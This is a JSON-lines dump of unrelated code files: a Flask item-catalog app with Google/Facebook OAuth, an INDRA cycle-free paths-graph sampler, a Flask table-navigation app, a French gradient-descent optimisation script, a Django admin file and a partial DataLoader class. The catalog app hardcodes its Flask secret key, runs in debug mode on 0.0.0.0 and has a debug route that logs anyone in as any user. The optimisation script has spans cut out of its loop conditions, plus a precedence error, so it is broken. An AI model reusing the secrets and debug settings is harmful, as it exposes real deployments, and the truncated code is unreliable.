The id of the category to be displayed.\n Returns:\n The rendered page for the category.\"\"\"\n return render_template(\n 'items.html',\n user=login_session,\n category=getCategory(category_id),\n items=getAllItemsInCategory(category_id))\n\n\n@app.route('/categories//item//')\ndef showItem(category_id, item_id):\n \"\"\"The view for an individual item.\n\n Args:\n category_id: The id of the category containing the item.\n item_id: The id of the item to be displayed.\n Returns:\n The rendered page for the item.\"\"\"\n return render_template(\n 'item.html',\n user=login_session,\n item=getItem(item_id),\n category=getCategory(category_id))\n\n\n@app.route('/categories/new/', methods=['GET', 'POST'])\n@login_required\ndef newCategory():\n \"\"\"The view for creating new categories.\n\n Decorators:\n @login_required: Tests user authentication\n Returns:\n POST: Creates a category and redirects to '/'\n GET: Renders the newCategory page.\n \"\"\"\n if request.method == 'POST':\n createCategory(\n name=request.form['name'],\n description=request.form['description'],\n user_id=login_session['user_id'])\n return redirect('/')\n else:\n return render_template(\n 'newCategory.html',\n user=login_session)\n\n\n@app.route('/categories//edit/', methods=['GET', 'POST'])\n@login_required\n@authorization_required\ndef editCategory(category_id):\n \"\"\"The view for editing a category.\n\n Args:\n category_id: The id of the category to be edited.\n Decorators:\n @login_required: Tests user authentication\n @authorization_required: Tests user authorization.\n Returns:\n POST: Updates a category and redirects to '/'\n GET: Renders the editCategory page.\n \"\"\"\n if request.method == 'POST':\n updateCategory(\n category_id=category_id,\n name=request.form['name'],\n description=request.form['description'])\n return redirect('/')\n else:\n return render_template(\n 'editCategory.html',\n user=login_session,\n category=getCategory(category_id))\n\n\n@app.route('/categories//delete/', methods=['GET', 'POST'])\n@login_required\n@authorization_required\n@valid_state_token_required\ndef deleteCategory(category_id, state=None):\n \"\"\"The view for deleting a category.\n\n Args:\n category_id: The id of the category to be edited.\n state: A state-token.\n Decorators:\n @login_required: Tests user authentication\n @authorization_required: Tests user authorization.\n @valid_state_token_required: Tests for a valid state-token.\n Returns:\n POST: Deletes a category and redirects to '/'\n GET: Renders the deleteCategory page.\n \"\"\"\n if request.method == 'POST':\n category_name = removeCategory(category_id)\n flash(\"{name} was deleted.\".format(name=category_name))\n return redirect('/')\n else:\n state = login_session['state'] = getNewState()\n return render_template(\n 'deleteCategory.html',\n state=state,\n user=login_session,\n category=getCategory(category_id))\n\n\n@app.route('/categories//new/', methods=['GET', 'POST'])\n@login_required\ndef newItem(category_id):\n \"\"\"The view for creating a new item.\n\n Args:\n category_id: The id of the category containing the item.\n Decorators:\n @login_required: Tests user authentication\n Returns:\n POST: Creates an item and redirects to the category page.\n GET: Renders the newItem page.\n \"\"\"\n if request.method == 'POST':\n createItem(\n name=request.form['name'],\n description=request.form['description'],\n picture=request.form['picture'],\n category_id=category_id,\n user_id=login_session['user_id'])\n return redirect(url_for(\n 'showAllItemsInCategory',\n category_id=category_id))\n else:\n return render_template(\n 'newItem.html',\n user=login_session,\n category=getCategory(category_id))\n\n\n@app.route(\n '/categories///edit/',\n methods=['GET', 'POST'])\n@login_required\n@authorization_required\ndef editItem(category_id, item_id):\n \"\"\"The view for editing an item.\n\n Args:\n category_id: The id of the category containing the item.\n item_id: The id of the item to be edited.\n Decorators:\n @login_required: Tests user authentication\n @authorization_required: Tests user authorization.\n Returns:\n POST: Updates an item and redirects to the category page.\n GET: Renders the editItem page.\n \"\"\"\n if request.method == 'POST':\n item_name = request.form['name']\n updateItem(\n item_id=item_id,\n name=item_name,\n description=request.form['description'],\n picture=request.form['picture'])\n flash(\"{item} updated.\".format(item=item_name))\n return redirect(url_for(\n 'showAllItemsInCategory',\n category_id=category_id))\n else:\n return render_template(\n 'editItem.html',\n user=login_session,\n item=getItem(item_id),\n category_id=category_id)\n\n\n@app.route(\n '/categories///delete/',\n methods=['GET', 'POST'])\n@login_required\n@authorization_required\n@valid_state_token_required\ndef deleteItem(category_id, item_id):\n \"\"\"The view for deleting an item.\n\n Args:\n category_id: The id of the category containing the item.\n item_id: The id of the item to be deleted.\n Decorators:\n @login_required: Tests user authentication\n @authorization_required: Tests user authorization.\n @valid_state_token_required: Tests for a valid state-token.\n Returns:\n POST: Deletes an item and redirects to the category page.\n GET: Renders the deleteItem page.\n \"\"\"\n if request.method == 'POST':\n item_name = removeItem(item_id)\n flash(\"{name} deleted.\".format(name=item_name))\n return redirect(url_for(\n 'showAllItemsInCategory',\n category_id=category_id))\n else:\n state = login_session['state'] = getNewState()\n return render_template(\n 'deleteItem.html',\n state=state,\n user=login_session,\n category_id=category_id,\n item=getItem(item_id))\n\n\n@app.route('/catalog.json/')\ndef endpointJSON():\n \"\"\"JSON endpoint with application data.\n\n Returns:\n Application data for categories and items in JSON format.\"\"\"\n return jsonify(data=getSerializedContent())\n\n\n@app.route('/catalog.xml/')\ndef endpointXML():\n \"\"\"XML endpoint with application data.\n\n Returns:\n An XML template populated with application data for categories\n and items.\"\"\"\n response = make_response(render_template(\n 'catalog.xml',\n data=getSerializedContent()))\n response.headers[\"Content-Type\"] = \"application/xml\"\n return response\n\n\n@app.route('/login', methods=['GET', 'POST'])\n@valid_state_token_required\ndef login():\n \"\"\"The view for user login. Users can be authenticated using OAuth 2.0.\n\n Decorators:\n @valid_state_token_required: Tests for a valid state-token.\n Returns:\n POST: Calls the function for the login provider, which returns\n a URL to the page to be redirected to.\n GET: Renders the login page.\n \"\"\"\n # Check if the user is already logged in.\n if 'user_id' in login_session:\n flash(\"You are already logged in. Try loggin out before logging in\"\n \"with a different account.\")\n return redirect('/')\n\n if request.method == 'GET':\n state = login_session['state'] = getNewState()\n return render_template(\n 'login.html',\n user=login_session,\n state=state)\n else:\n # Obtain authorization code\n auth_code = request.data\n if request.args.get('provider') == 'google':\n return googleOAuth2Connect(auth_code)\n else:\n return facebookOAuth2Connect(auth_code)\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n \"\"\"The view for logging the user out.\n\n Decorators:\n @login_required: Tests user authentication\n Returns:\n POST: Logs out the user and deletes the session, redirecting to the\n front page.\n GET: Renders the logout page.\n \"\"\"\n result = {}\n if login_session['provider'] == 'google':\n # Execute HTTP GET request to revoke current token.\n access_token = login_session['credentials'].access_token\n url = (\"https://accounts.google.com/o/oauth2/revoke?\"\n \"token={}\").format(access_token)\n h = httplib2.Http()\n result = h.request(url, 'GET')\n else:\n facebook_id = login_session['facebook_id']\n # The access token must me included to successfully logout\n access_token = login_session['access_token']\n url = (\"https://graph.facebook.com/{}/permissions?\"\n \"access_token={}\").format(facebook_id, access_token)\n h = httplib2.Http()\n result = h.request(url, 'DELETE')\n\n if result[0]['status'] == '200':\n # Reset the users session.\n if login_session['provider'] == 'google':\n del login_session['credentials']\n del login_session['gplus_id']\n else:\n del login_session['access_token']\n del login_session['facebook_id']\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n del login_session['user_id']\n\n flash(\"you are now logged out\")\n return redirect('/')\n else:\n # For whatever reason, the given token was invalid.\n flash(\"Failed to revoke token, login was unsuccessful.\")\n return redirect('/')\n\n\n@app.route('/login/testuser//')\ndef loginTestUser(user_id):\n \"\"\"A view for testing. Allows the tester to create testusers, and login as\n testusers that have already been created.\n\n If you want to use the testusers you simply visit a URL that conforms with\n the route of this function, and the user will be logged in, and be created,\n if it didn't exist already.\"\"\"\n if app.debug:\n login_session['username'] = 'Testuser{}'.format(user_id)\n login_session['email'] = 'testuser{}@gmail.com'.format(user_id)\n login_session['picture'] = 'http://fillmurray.com/200/200'\n login_session['user_id'] = user_id\n flash(\"you are now logged in as %s\" % login_session['username'])\n else:\n flash(\"You are not in debug mode.\")\n\n return redirect('/')\n\n\n@app.route('/logout/testuser/')\ndef logoutTestUser():\n \"\"\"A view for testing. Allows the tester to log out from a testuser\n session.\n\n Visit the URL to log out a testuser and delete the session.\"\"\"\n if app.debug:\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n del login_session['user_id']\n flash(\"You are now logged out.\")\n else:\n flash(\"You are not in debug mode.\")\n\n return redirect('/')\n\n\nif __name__ == '__main__':\n app.secret_key = 'v0KrmNKYvijMGOoURh6o'\n app.debug = True\n app.run(host='0.0.0.0', port=80)\n","sub_path":"catalog/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"203687077","text":"\"\"\"\r\nCompute cycle-free paths graphs for use in sampling causal paths.\r\n\r\nA *paths-graph,* say *G_n*, has the property that every node in *G_n* lies on a\r\npath of length n from source to target. These paths may not be cycle-free. This\r\nmodule transforms *G_n* into a new graph *G_cf* such that in *G_cf* every node\r\nlies on a cycle-free path from the source to a target. Note that it will *not*\r\nbe the case, despite the misleading name *G_cf*, that *G_cf* contains *only*\r\ncycle-free paths. However, we are able to \"easily\" sample cycle-free paths from\r\n*G_cf* without any backtracking using metadata attached to each node in *G_cf*.\r\n\r\nThe algorithm is described further in :py:func:`cycle_free_paths_graph`, below.\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport itertools\r\nfrom copy import copy, deepcopy\r\nimport networkx as nx\r\nfrom indra.explanation import paths_graph\r\n\r\n\r\ndef cycle_free_paths_graph(pg, source, target, path_length):\r\n \"\"\"Compute a cycle free paths graph.\r\n\r\n Starting from the \"raw\" (i.e., containing cycles) paths graph, and given a\r\n target path length n, the algorithm iterates over each \"level\" in the\r\n graph 0 <= k <= n where level 0 consists only of the source node and level\r\n n consists only of the target.\r\n\r\n Each level k consists of a set of nodes, X; we examine each node x in X and\r\n identify the subset of nodes that are reachable in both the forward and\r\n backward directions from x. If any of the nodes in the forward reach\r\n subgraph contain x itself (but at a different depth), this represents a\r\n cyclic path back through x that is then pruned.\r\n\r\n Each node x therefore defines its own subgraph of cycle free paths, g_x.\r\n After iterating over all x in X, we combine these subgraphs into the\r\n (in-progress) cycle free paths graph H_k. H_k therefore consists of the\r\n superset of nodes of all the subgraphs g_x for level k. When merging these\r\n subgraphs we prevent the re-introduction of cyclic paths by annotating each\r\n node in the graph with a list of \"tags\". The tags for any given node\r\n consist of a list of nodes lying at prior (upstream) levels. Therefore\r\n during sampling, transitions from an upstream node to a downstream node are\r\n only permissible if all nodes in the path up to a certain level are\r\n contained in the tag set of the downstream node.\r\n\r\n Parameters\r\n ----------\r\n pg : networkx.DiGraph()\r\n \"Raw\" (contains cycles) paths graph as created by\r\n :py:func:`indra.explanation.paths_graph.paths_graph`.\r\n source : tuple\r\n Source node, of the form (0, source_name).\r\n target : tuple\r\n Target node, of the form (target_depth, source_name).\r\n path_length : int\r\n Desired path length.\r\n\r\n Returns\r\n -------\r\n tuple : (networkx.DiGraph(), dict)\r\n The initialized, not-yet cycle free paths graph consists of the\r\n paths graph remaining after cycles through the source or target\r\n nodes are removed. The dict represents an initial set of tags\r\n defining the permissible forward nodes from a given node (i.e.,\r\n those nodes lying on a cycle free path).\r\n \"\"\"\r\n # Initialize the cycle-free paths graph and the tag dictionary\r\n dic_PG = {0: _initialize_cfpg(pg, source, target)}\r\n round_counter = 1\r\n # Perform CFPG generation in successive rounds to ensure convergence\r\n while True:\r\n print(\"Starting round %d\" % round_counter)\r\n print(\"Level 0: %d nodes, %d edges\" % (len(dic_PG[0][0]),\r\n len(dic_PG[0][0].edges())))\r\n for k in range(1, path_length):\r\n # Start by copying the information from the previous level\r\n H = dic_PG[k-1][0].copy()\r\n tags = deepcopy(dic_PG[k-1][1])\r\n # Check if we have already detected there are no cycle free paths.\r\n # If so just propagate this information.\r\n if not H:\r\n dic_PG[k] = dic_PG[k-1]\r\n else:\r\n # Identify the nodes at level k in G_(k-1)\r\n X = [v for v in H.nodes_iter() if v[0] == k]\r\n # We will track the (g_x, tags_x) pairs contributed by each x\r\n # through dic_X\r\n dic_X = {}\r\n for x in X:\r\n tags_x = {}\r\n g_x_f = _forward(x, H)\r\n g_x_b = _backward(x, H)\r\n g_x = nx.DiGraph()\r\n g_x.add_edges_from(g_x_b.edges())\r\n g_x.add_edges_from(g_x_f.edges())\r\n # Get the nodes in the forward reach set representing cycles\r\n # back through node x, (excluding x at level k)\r\n nodes_to_prune = [v for v in g_x_f\r\n if v[1] == x[1] and v[0] != k]\r\n # If there are no nodes to prune then just add the tag 'x'\r\n # to all the nodes in g_x_f but not to x\r\n g_x_prune = _prune(g_x, nodes_to_prune, source, target)\r\n # If target or x gets pruned then x will contribute\r\n # nothing to G_k\r\n if (target not in g_x_prune) or (x not in g_x_prune):\r\n pass\r\n nodes_to_tag = [v for v in g_x_prune.nodes_iter()\r\n if v[0] > k]\r\n # Otherwise add the tag x to the nodes in the strict\r\n # future of x. update dic_X\r\n for v in g_x_prune.nodes_iter():\r\n if v[0] > k:\r\n D = tags[v]\r\n D.append(x[1])\r\n tags_x[v] = D\r\n else:\r\n tags_x[v] = tags[v]\r\n dic_X[x] = (g_x_prune, tags_x)\r\n # We can now piece together the pairs in dic_X to obtain (G_k,\r\n # tags_k)\r\n H_k = nx.DiGraph()\r\n tags_k = {}\r\n for x in X:\r\n h_x = dic_X[x][0]\r\n H_k.add_edges_from(h_x.edges())\r\n for v in H_k.nodes_iter():\r\n t = []\r\n for x in X:\r\n if v in dic_X[x][0]:\r\n tags_x = dic_X[x][1]\r\n t.extend(tags_x[v])\r\n t = list(set(t))\r\n tags_k[v] = t\r\n dic_PG[k] = (H_k, tags_k)\r\n print(\"Level %d: %d nodes, %d edges\" % (k, len(dic_PG[k][0]),\r\n len(dic_PG[k][0].edges())))\r\n if not dic_PG[len(dic_PG)-1][0] or \\\r\n set(dic_PG[0][0].edges()) == set(dic_PG[len(dic_PG)-1][0].edges()):\r\n break\r\n else:\r\n dic_PG = {0: dic_PG[k]}\r\n round_counter += 1\r\n return dic_PG\r\n\r\n\r\ndef _initialize_cfpg(pg, source, target):\r\n \"\"\"Initialize cycle free paths graph data structures.\r\n\r\n Parameters\r\n ----------\r\n pg : networkx.DiGraph()\r\n \"Raw\" (contains cycles) paths graph as created by\r\n :py:func:`indra.explanation.paths_graph.paths_graph`.\r\n source : tuple\r\n Source node, of the form (0, source_name).\r\n target : tuple\r\n Target node, of the form (target_depth, source_name).\r\n\r\n Returns\r\n -------\r\n tuple : (networkx.DiGraph(), dict)\r\n The initialized, not-yet cycle free paths graph consists of the\r\n paths graph remaining after cycles through the source or target\r\n nodes are removed. The dict represents an initial set of tags\r\n defining the permissible forward nodes from a given node (i.e.,\r\n those nodes lying on a cycle free path).\r\n \"\"\"\r\n # Identify the initial set of nodes to be pruned. In this initial phase,\r\n # they are simply nodes whose names match the source or target.\r\n nodes_to_prune = set([v for v in pg.nodes_iter()\r\n if (v != source) and (v != target) and \\\r\n ((v[1] == source[1]) or (v[1] == target[1]))])\r\n # Get the paths graph after initial source/target cycle pruning\r\n pg_0 = _prune(pg, nodes_to_prune, source, target)\r\n # Initialize an empty list of tags for each node\r\n tags = dict([(node, []) for node in pg_0.nodes_iter()])\r\n # Add source tag to all nodes except source itself\r\n _add_tag(tags, source, [v for v in pg_0.nodes_iter() if v != source])\r\n return (pg_0, tags)\r\n\r\n\r\ndef _prune(pg, nodes_to_prune, source, target):\r\n \"\"\"Iteratively prunes nodes from a copy of the paths graph.\r\n\r\n We prune the graph *pg* iteratively by the following procedure:\r\n\r\n 1. Remove the nodes given by *nodes_to_prune* from the graph.\r\n 2. Identify nodes (other than the source node) that now have no\r\n incoming edges.\r\n 3. Identify nodes (other than the target node) that now have no outgoing\r\n edges.\r\n 4. Set *nodes_to_prune* to the nodes identified in steps 2 and 3.\r\n 5. Repeat from 1 until there are no more nodes to prune.\r\n\r\n Parameters\r\n ----------\r\n pg : networkx.DiGraph\r\n Paths graph to prune.\r\n nodes_to_prune : list\r\n Nodes to prune from paths graph.\r\n source : tuple\r\n Source node, of the form (0, source_name).\r\n target : tuple\r\n Target node, of the form (target_depth, source_name).\r\n\r\n Returns\r\n -------\r\n networkx.DiGraph()\r\n Pruned paths graph.\r\n \"\"\"\r\n # First check if we are pruning any nodes to prevent unnecessary copying\r\n # of the paths graph\r\n if not nodes_to_prune:\r\n return pg\r\n # Make a copy of the graph\r\n pg_pruned = pg.copy()\r\n # Perform iterative pruning\r\n while nodes_to_prune:\r\n # Remove the nodes in our pruning list\r\n pg_pruned.remove_nodes_from(nodes_to_prune)\r\n # Make a list of nodes whose in or out degree is now 0 (making\r\n # sure to exclude the source and target, whose depths are at 0 and\r\n # path_length, respectively)\r\n no_in_edges = [node for node, in_deg in pg_pruned.in_degree_iter()\r\n if in_deg == 0 and node != source]\r\n no_out_edges = [node for node, out_deg in pg_pruned.out_degree_iter()\r\n if out_deg == 0 and node != target]\r\n nodes_to_prune = set(no_in_edges + no_out_edges)\r\n return pg_pruned\r\n\r\n\r\n# Function for updating node tags in place\r\ndef _add_tag(tag_dict, tag_node, nodes_to_tag):\r\n for v in nodes_to_tag:\r\n tag_dict[v].append(tag_node[1])\r\n\r\n\r\ndef _forward(v, H):\r\n \"\"\"Compute the subgraph of H defined by the paths forward from node v.\r\n\r\n Parameters\r\n ----------\r\n v : tuple(int, str)\r\n The node to get the _forward subgraph for.\r\n H : networkx.DiGraph()\r\n For a given path length n, H defines the graph G_i at the i-th stage\r\n for 1 <= i <= n.\r\n\r\n Returns\r\n -------\r\n networkx.DiGraph()\r\n Subgraph reachable by forward paths from v in H.\r\n \"\"\"\r\n j = v[0]\r\n L = {}\r\n L[j] = [v]\r\n h = nx.DiGraph()\r\n for k in range(j+1, 10):\r\n for v in L[k-1]:\r\n h.add_edges_from(H.out_edges(v))\r\n L[k] = [w for w in h if w[0] == k]\r\n return h\r\n\r\n\r\ndef _backward(v, H):\r\n \"\"\"Compute the subgraph of H defined by the paths backward from node v.\r\n\r\n Parameters\r\n ----------\r\n v : tuple(int, str)\r\n The node to get the _backward subgraph for.\r\n H : networkx.DiGraph()\r\n For a given path length n, H defines the graph G_i at the i-th stage\r\n for 1 <= i <= n.\r\n\r\n Returns\r\n -------\r\n networkx.DiGraph()\r\n Subgraph reachable by backward paths from v in H.\r\n \"\"\"\r\n j = v[0]\r\n L = {}\r\n L[j] = [v]\r\n J = list(reversed(range(0, j)))\r\n h = nx.DiGraph()\r\n for k in J:\r\n for v in L[k+1]:\r\n h.add_edges_from(H.in_edges(v))\r\n L[k] = [w for w in h if w[0] == k]\r\n return h\r\n\r\n\r\ndef _cf_succ(H, t, path, v):\r\n \"\"\"Randomly choose a successor node of v.\r\n\r\n Parameters\r\n ----------\r\n H : networkx.DiGraph()\r\n The cycle free paths graph.\r\n t : dict\r\n The tags dictionary.\r\n path : list\r\n The path so far (list of nodes).\r\n v : tuple\r\n The current node.\r\n\r\n Returns\r\n -------\r\n tuple\r\n Randomly chosen successor node on a non-cyclic path.\r\n \"\"\"\r\n succ = []\r\n for u in H.successors(v):\r\n if set(path) <= set(t[u]):\r\n succ.append(u)\r\n # Note that the circuitous way of choosing from this list is the result of\r\n # the odd way numpy.random handles lists of lists (it excepts).\r\n idx_list = list(range(len(succ)))\r\n w_idx = np.random.choice(idx_list)\r\n w = succ[w_idx]\r\n return w\r\n\r\n\r\ndef sample_single_path(source, target, H, t):\r\n \"\"\"Sample a single cycle-free path.\r\n\r\n The sampling procedure uses the tag sets to trace out cycle-free\r\n paths. If we have reached a node *v* via the path *p* then we can choose\r\n the successor *u* of *v* as the next node only if *p* appears in the tag\r\n set of u.\r\n\r\n Parameters\r\n ----------\r\n source : tuple\r\n Source node, of the form (0, source_name).\r\n target : tuple\r\n Target node, of the form (target_depth, source_name).\r\n H : networkx.DiGraph()\r\n The cycle free paths graph.\r\n t : dict\r\n The tags dictionary.\r\n\r\n Returns\r\n -------\r\n list of strings\r\n A randomly sampled, non-cyclic path. Nodes are represented as node\r\n names only, i.e., the depth prefixes are removed.\r\n \"\"\"\r\n path = [source[1]]\r\n current = source\r\n while current != target:\r\n next = _cf_succ(H, t, path, current)\r\n \"\"\" a sanity check; since I have not stree-tested the code yet \"\"\"\r\n assert next[1] not in path, \"Error: found a cycle\"\r\n path.append(next[1])\r\n current = next\r\n return tuple(path)\r\n\r\n\r\ndef sample_many_paths(source, target, H, t, n):\r\n \"\"\"Sample many cycle-free paths.\r\n\r\n Parameters\r\n ----------\r\n source : tuple\r\n Source node, of the form (0, source_name).\r\n target : tuple\r\n Target node, of the form (target_depth, source_name).\r\n H : networkx.DiGraph()\r\n The cycle free paths graph.\r\n t : dict\r\n The tags dictionary.\r\n\r\n Returns\r\n -------\r\n list of lists\r\n Each item in the list is a list of strings representing a path. Note\r\n that the paths may not be unique.\r\n \"\"\"\r\n # If the graph is empty, then there are no paths\r\n if not H:\r\n return []\r\n P = []\r\n for i in range(0, n):\r\n p = sample_single_path(source, target, H, t)\r\n P.append(p)\r\n return P\r\n\r\n\r\ndef sample_paths(g, source, target, max_depth, target_polarity=None,\r\n num_paths=1000):\r\n print('Source: %s' % source)\r\n signed = True if target_polarity is not None else False\r\n\r\n (f_level, b_level) = paths_graph.get_reachable_sets(\r\n g, source, target, max_depth=10, signed=signed)\r\n all_paths = []\r\n for length in range(1, max_depth):\r\n print(\"Path length: %d\" % length)\r\n pg_raw = paths_graph.paths_graph(g, source, target, length, f_level,\r\n b_level, signed=signed,\r\n target_polarity=target_polarity)\r\n # Append depths to our source and target nodes\r\n src = (0, (source, 0))\r\n tgt = (length, (target, target_polarity))\r\n dic_PG = cycle_free_paths_graph(pg_raw, src, tgt, length)\r\n G_cf, T = dic_PG[length-1]\r\n try:\r\n P = sample_many_paths(src, tgt, G_cf, T, num_paths)\r\n all_paths.extend(P)\r\n except IndexError:\r\n pass\r\n return all_paths\r\n\r\n\r\nif __name__ == '__main__':\r\n G_0 = paths_graph.get_edges('korkut_im.sif')\r\n source = 'BLK_phosphoY389_phosphorylation_PTK2_Y397'\r\n target = 'EIF4EBP1_T37_p_obs'\r\n\r\n (f_level, b_level) = paths_graph.get_reachable_sets(G_0, source, target,\r\n max_depth=10, signed=False)\r\n length = 8\r\n\r\n pg_raw = paths_graph.paths_graph(G_0, source, target, length, f_level,\r\n b_level, signed=False, target_polarity=0)\r\n\r\n # Append depths to our source and target nodes\r\n src = (0, source)\r\n tgt = (length, target)\r\n dic_PG = cycle_free_paths_graph(pg_raw, src, tgt, length)\r\n G_cf, T = dic_PG[7]\r\n P = sample_many_paths(src, tgt, G_cf, T, 1000)\r\n #print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n\r\n","sub_path":"indra/explanation/cycle_free_paths_old.py","file_name":"cycle_free_paths_old.py","file_ext":"py","file_size_in_byte":16661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"168329150","text":"#!/usr/bin/env python\nfrom flask import * \n\nvalue = 0\n\napp = Flask(__name__) \n \n@app.route('/login',methods = ['POST']) \ndef login(): \n uname=request.form['number'] \n #passwrd=request.form['pass'] \n if uname==\"A\": \n # global value\n # value = 1\n # print(value)\n lines = [\"1\"]\n with open('readme.txt', 'w') as f:\n f.write('\\n'.join(lines))\n return \"Going to Table NO %s\" %uname \n\n elif uname==\"B\": \n lines = [\"2\"]\n with open('readme.txt', 'w') as f:\n f.write('\\n'.join(lines))\n return \"Going to Table NO %s\" %uname \n\n elif uname==\"C\": \n lines = [\"3\"]\n with open('readme.txt', 'w') as f:\n f.write('\\n'.join(lines))\n return \"Going to Table NO %s\" %uname \n\n elif uname==\"D\": \n lines = [\"4\"]\n with open('readme.txt', 'w') as f:\n f.write('\\n'.join(lines))\n return \"Going to Table NO %s\" %uname \n\n elif uname==\"H\":\n lines = [\"0\"]\n with open('readme.txt', 'w') as f:\n f.write('\\n'.join(lines))\n return \"Going to HOME\" \n\n else:\n return \"Entered wrong table number\"\n\n \nif __name__ == '__main__': \n app.run(debug = True) ","sub_path":"1st Externship Batch/Autonomous Navigation/c20_menu/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"343231810","text":"import matplotlib.pyplot as plt\nfrom numpy import *\nfrom math import *\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef f(x,y): \n return ((x-y)**2 + 10*(x**2-y)**2)\n\n \n\n#TRACER UNE FONCTION F(x,y) sur [-10,10]\nX=linspace(-10,10,10)\nY=linspace(-10,10,10)\nX,Y=meshgrid(X,Y)\nZ=f(X,Y)\n\n\n\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\nax.plot_wireframe(X, Y, Z) # tracé de la courbe\n\nax.set_xlabel('Axe x') # label de l'axe Ox\nax.set_ylabel('Axe y') # label de l'axe Oy\nax.set_zlabel('Axe z') # label de l'axe Oz\nax.set_zlabel('Z Label')\n\n\n#METHODE GRADIENT PAS FIXE POUR F(x,y)\ndef norme (x): #x est de la forme (a,b)\n '''x est un vecteur de R^2 et on calcule sa norme'''\n return(sqrt(x[0]**2+ x[1]**2))\n \ndef gradf (x, y):\n '''gradient de la fonction de Rosenbrook'''\n return((2*x-2+ 40*x*(x**2-y), -20*(x**2-y)))\n\ndef pas_Fixe (x, p): #p est le pas x est le vecteur de R^2\n epsilon = 0.01 #erreur de convergence de la suite des xk\n nmax= 1000 #nombre maximal d'itérations de l'algorithme fixé par l'utilisateur \n n=0 #compteur d'itérations\n a,b = x\n X=[a] #liste des abscisses de xk\n Y=[b] #idem mais ordonnées\n\n while norme( gradf(a,b)) > epsilon and n epsilon: #on s'arrete lorsuq'on a un intervalle suffisament petit autour du minimum\n #calcul des nouvelles bornes potentielles de l'intervalle\n #a< a'< b'< b\n aprime= a + (b-a)/(tau**2)\n bprime= a + (b-a)/tau\n if pasOptimal (aprime, x)> pasOptimal (bprime, x):\n #le minimum est dans la partie droite de l'intervalle: [a', b]\n a= aprime\n if pasOptimal (aprime, x)< pasOptimal (bprime, x):\n #le minimum est dans la partie gauche de l'intervalle: [a, b']\n b= bprime\n else:\n #le minimum est entre a' et b'\n a= aprime\n b= bprime\n err= b-a\n it+=1\n return((a+b)/2) #on convient d'approximer la valeur du minimum par celle du centre de l'intervalle le contenant\n\ndef grad_pasOptimal (x, p):\n epsilon = 0.01\n nmax= 1000\n n=0\n a,b = x\n Z=[f(a,b)]\n while norme( gradf(a,b)) > epsilon and n Eps and i < 200000000 :\n aprime = a + ((b-a)/t**2)\n bprime = a + ((b-a)/t)\n if f(aprime) > f(bprime):\n a = aprime\n if f(aprime) < f(bprime) : \n b = bprime\n else :\n a = aprime\n b = bprime \n Err = b-a\n i+=1\n return(a+b/2)\n ","sub_path":"tp_1.py","file_name":"tp_1.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"148445202","text":"from django.contrib import admin\n\nfrom .models import UserProfile\n\n\nclass UserProfileModelAdmin(admin.ModelAdmin):\n list_display = [\n 'user',\n 'slug',\n 'gender',\n 'birthday',\n 'phone_no',\n 'country',\n ]\n list_display_links = [\n 'user',\n 'slug',\n ]\n list_filter = [\n 'gender',\n 'birthday',\n 'country',\n ]\n search_fields = [\n 'user__username',\n 'user__first_name',\n 'user__last_name',\n 'slug',\n 'description',\n 'google_social',\n 'facebook_social',\n 'instagram_social',\n 'twitter_social',\n 'vk_social',\n 'interests__name',\n 'birthday',\n 'phone_no',\n 'followers__user__username',\n 'following__user__username',\n ]\n\n class Meta:\n model = UserProfile\n\n\nadmin.site.register(UserProfile, UserProfileModelAdmin)\n","sub_path":"userprofile_app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"468065604","text":"import os\nimport pandas as pd\nimport numpy as np\n\nfrom codifyComplexes.CodifyComplexException import CodifyComplexException\nfrom Config import Configuration\n\nclass DataLoader(Configuration):\n '''\n This class implements loading file functions\n '''\n \n ARE_STR_TYPE_COLUMNS= [\"chainId\", \"structResId\", \"chainIdL\", \"structResIdL\", \"resNameL\", \"chainIdR\", \n \"structResIdR\", \"resNameR\", \"resName\" ]\n ALWAYS_SKIP_COLUMNS=[\"seqIndex\"]\n IGNORE_X_AA= False\n \n def __init__(self, dataRootPath, singleChainfeatsToInclude, pairfeatsToInclude=None, verbose=False):\n '''\n @param dataRootPath: str. A path to computedFeatures directory that contains needed features. Example:\n computedFeatures/\n common/\n contactMaps/\n seqStep/\n conservation/\n ...\n structStep/\n PSAIA/\n VORONOI/\n ... \n\n @param singleChainfeatsToInclude: dict. Dictionary that contains the paths where features needed for complex codification \n that describre single chain properties are\n located. Must have the following format:\n {\"featName\":(relativePath_from_dataRootPath, listOfColumnNumbers, dictForNamedColums)}\n dictForNamedColums= {\"myFeatName\":colNumber}\n @param pairfeatsToInclude: dict. Dictionary that contains the paths where features needed for complex codification \n that describre single chain properties are\n located. Must have the following format:\n {\"featName\":(relativePath_from_dataRootPath, listOfColumnNumbers, dictForNamedColums)}\n dictForNamedColums= {\"myFeatName\":colNumber}\n @param verbose: bool.\n ''' \n Configuration.__init__(self)\n self.dataRootPath= dataRootPath\n self.verbose= verbose\n self.singleChainfeatsToInclude= singleChainfeatsToInclude\n self.pairfeatsToInclude= None if pairfeatsToInclude is None else pairfeatsToInclude[:]\n\n def getParamsForLoadingFile(self, prefixOneChainType, featNum, useNameColum=None, lookForPairFeats=False):\n '''\n Given a ligand or receptor id (prefixOneChainType) and a feature_name(featName) which is a key \n in self.singleChainfeatsToInclude dictionary, returns an iterator over all files involved in that \n feature and the column numbers that where selected. By default, selected columns are stored\n in self.singleChainfeatsToInclude, but if useNameColumn is specified, selectedCols will be a one \n element list with the index of the column whose name matches useNameColumn\n @param prefixOneChainType: str. A prefix that identifies the receptor or the ligand of a complex\n @param featNum: int. indice of singleChainfeatsToInclude list that contains information of features\n @param useNameColum: str. If None, selectedCols will be obtained from 